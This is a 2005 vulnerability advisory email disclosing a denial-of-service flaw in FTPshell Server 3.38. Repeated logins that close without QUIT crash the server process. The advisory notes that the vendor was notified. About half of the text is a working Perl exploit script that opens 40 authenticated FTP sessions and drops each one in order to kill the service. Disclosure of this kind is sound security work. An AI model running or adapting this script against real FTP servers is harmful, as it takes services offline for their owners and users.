Date: Mon, 25 Jul 2005 19:50:41 -0700
From: Reed Arvin <reedarvin@gmail.com.>
To: [email protected], [email protected],
Subject: Denial of service vulnerability in FTPshell Server Version 3.38
Mime-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline
X-Virus-Scanned: antivirus-gw at tyumen.ru
Summary:
Denial of service vulnerability in FTPshell Server Version 3.38
(http://www.ftpshell.com/)
Details:
Logging into the FTP server successfully and then closing the
connection (without using the QUIT command) 39 times will cause the
ftpshelld.exe process will die.
Vulnerable Versions:
FTPshell Server Version 3.38
Patches/Workarounds:
The vendor was notified of the issue. A patch will be release shorly.
The patch will be made available via the vendor's web site
(http://www.ftpshell.com/).
Exploits:
Run the following PERL script against the server. The corresponding
process will die.
#=3D=3D=3D=3D=3D Start FTPShell_FTPDOS.pl =3D=3D=3D=3D=3D
#
# Usage: FTPShell_FTPDOS.pl <ip> <user> <pass>
# FTPShell_FTPDOS.pl 127.0.0.1 hello moto
#
# FTPshell Server Version 3.38
#
# Download:
# http://www.ftpshell.com/
#
################################################
use IO::Socket;
use Win32;
use strict;
my($i) =3D "";
my($socket) =3D "";
for ($i =3D 1; $i <=3D 40; $i++)
{
if ($socket =3D IO::Socket::INET->new(PeerAddr =3D> $ARGV[0],
PeerPort =3D> "21",
Proto =3D> "TCP"))
{
print "Login \#$i\n";
Win32::Sleep(300);
print $socket "USER $ARGV[1]\r\n";
Win32::Sleep(100);
print $socket "PASS $ARGV[2]\r\n";
Win32::Sleep(100);
print $socket "PORT 127,0,0,1,18,12\r\n";
Win32::Sleep(100);
close($socket);
}
else
{
print "Cannot connect to $ARGV[0]:21\n";
}
}
#=3D=3D=3D=3D=3D Start FTPShell_FTPDOS.pl =3D=3D=3D=3D=3D
Discovered by Reed Arvin reedarvin[at]gmail[dot]com
(http://reedarvin.thearvins.com/)
Vulnerability discovered using PeachFuzz
(http://reedarvin.thearvins.com/tools.html)
